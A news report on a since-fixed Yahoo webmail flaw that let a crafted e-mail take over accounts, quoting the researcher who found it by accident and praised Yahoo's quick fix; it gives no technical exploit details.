Yahoo has fixed a bug in its Web based e-mail system that would have allowed attackers to seize control of users' e-mail accounts.
In effect, this enabled attackers to take control of a user's account by sending them a specially crafted e-mail.
"A remarkable note about this bug is that no one seems to have found it before," Copley's advisory reads. "As far as anyone knows."
Speaking to ZDNet Australia by phone from the U.S, Copley said it would be possible to use the flaw to capture the username and password of a Yahoo account holder.
"You can change the page that they're looking at. You can get all their contact information. You can do anything that a user would do on the page," he said. "The main thing people would do with this is to grab usernames and passwords through a re-login page."
The bug would also allow an attacker to seize the user's session cookie, which contains personal user details submitted to Yahoo. Copley has praised Yahoo's response to the issue.
"They were very professional and fixed it very quickly. I was impressed," he said.
The discovery of the bug did not come from hours of pain-staking research, Copley admits. He found it when another researcher, known as "http-equiv", sent him a virus, for research purposes, by e-mail that was over 100kb in size.
"He was showing me a virus that was using one of my bugs in the wild. It had all this code, and one of the parts just started running," he explained. "We found it by accident."